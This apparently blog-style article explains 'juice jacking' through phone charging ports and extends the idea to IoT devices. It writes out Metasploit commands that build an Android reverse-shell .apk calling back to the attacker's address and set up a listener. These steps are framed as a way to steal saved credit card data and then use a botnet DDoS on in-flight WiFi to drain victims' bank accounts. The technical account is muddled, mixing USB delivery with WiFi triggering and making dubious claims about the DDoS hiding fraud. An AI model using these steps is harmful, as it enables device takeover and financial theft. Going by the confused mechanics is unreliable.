Exploiting Devices using Juice Jacking to compromise IoT

By Nikhil Dutta

 

Juice jacking is a Trojan exploit used to gain unauthorized access to mobile devices and retrieve information, this exploit consists of two modular codes; a Remote Access Trojan (RAT) and a Metasploit payload. The Metasploit payload is a .apk file which is used to manipulate connections to a network on that device. RAT is then executed to gain complete control of the device and retrieve valuable information from the device. The most interesting aspect of Juice Jacking is the way it is spread, devices today in order to expedite efficiency have merged the charge port and the data transfer port. Furthermore because IoT devices have the same concept, it can be easily exploited as a gateway for the Trojan to spread to other IoT devices.

The juice jacking exploit uses the medium of physical transfer but since the medium of transfer is masked through the charging ports, this provides a very easy gateway to the devices. Documented cases of the exploit have been publicized for example locations like airports or train stations where travelers are targeted primary on one social engineering characteristic which is very common and can even be generalized to: “my phone is out of charge. Is there a charging point which I can use for a while?”. This has allowed attackers to use the exploit for their benefits. With juice jacking, the vulnerability or attack vector is the phone’s USB port; the exposure factor is dependent on the user’s awareness of this possible attack method and their phone’s battery life. When these two factors come together, the unsuspecting user plugs their phone into a malicious system; thus allowing the attack to take place. This can particularly affect business professional, with access to sensitive data on their phone.

There is no reason to presume the kiosks filling airports and other public places are inherently malicious. With a little mischief in mind a few targeted malware can essentially take over entire systems without the user knowing how and when. A concoction of a Remote Accessed Trojan (RAT) and a Metasploit payload is accoutered to empty your accounts.

Metasploit

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shell code archive and related research.

Metasploit opens a connection soon with the target android phone where you can do things like, record from their microphone, take a picture on their camera, look at their calls, look at their contacts, and look at their address.

This requires a connection between the metasploit console and the target machine. The gateway is provided by a payload which can be generated by typing the following command in the mfconsole:

msfpayload android/meterpreter/reverse_tcp LHOST=(your lan ip address) LPORT=8080 R > /root/Desktop/payload.apk

Payload.apk is the final lynch pin of the attack. It serves as the portal between the device and the hacker’s terminal. Once both the devices are connected to the same network, here the onboard WiFi, the payload can be triggered using simple autorun program or another RAT.

First, we will open the metasploit console by typing the following “msfconsole“

Once the metasploit console is open we will type,

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

Now you should have the payload all set, now we will set up the connections

set lhost (your lan ip address)

Now your local host is set up, but we still need to set up the port.

set lport 8080

Thus, when the user connects to the planes on board WiFi, inadvertently the payload is triggered. With that achieved the mfconsole can access all sorts of data and in this case saved credit card credentials from his msfconsole terminal using the following command.

exploit

This should open a connection soon with the target android phone where you can do things like, record their microphone, take a picture on their camera, look at their calls, look at their contacts, and look at their address.

Now is a matter of time and some data mining techniques to find credit card credentials in the phone. With this done, then comes the next stage of overloading the server to shut down to keep the user in dark about any unauthorized credit card activity taking place simultaneously. This is where the RAT digs through.

Remote Accessed Trojan (RAT)

RAT is Remote Access trojan. It is a piece of software or program which hacker uses to get complete control of your computer, it can be propagated in the form of images, videos or any other files. There are some RATs that even your antivirus software cannot detect.

This attack works best if multiple devices are targeted. All said targets, connected to the same network, form a botnet. Once the credit card information is accessed, the RAT in the phones can be triggered to use this botnet and send out a DDoS attack on the WiFi. This makes up for the perfect opportunity for the hacker to empty the bank accounts. By the time the victims land they’ve been cut loose from a lot of bank balance and they’re too late to do anything.

Extension of payload to IoT

The metasploit payload is used to control the network connection of the device. This functionality can further be used to create a DoS attack when passed to a string of interconnected devices. Since most devices have migrated to USB based charging, this has paved way for other devices to have the USB based charging as part of their specifications. This also includes numerous IoT devices.

This gives a chance for the above described technique to be used on the devices comprising of an IoT system. When applied to specifically targeted devices the metasploit payload could compromise its connectivity with other devices in the system. The only way to solve the problem would be to disconnect it with the system.

The use of IoT devices are often done by novice or technologically inexperienced users. At least the design of IoT was for the inexperienced users. This enables a huge opening for the juice jacking technique to be employed. The common knowledge of IoT devices requiring constant updates which aren’t necessary limited to software but also hardware. The very fact that cell phones in the past decade have processing powers equivalent to a small spec computer. This fact remains the same for IoT devices. The increase in importance given to propel the use of IoT forces these aspects to come into picture, thus opening avenues to exploit them. The recent use of raspberry pi to hold exploits also can be a way to transfer the payload as raspberry pi was designed for ease of integration with other devices which by fundamental definition are IoT.

The metasploit payload when transferred to the device gains control of network connectivity of that particular device. This can be used to manipulate incoming and outgoing traffic from the device. Since communication between devices have improved and have embodied encapsulation, disrupting the packets would provide another interesting challenge. But what comes easily is the control of outgoing traffic and disruption of communication link between the devices. This would thus cause an incremental DoS attack towards the IoT system.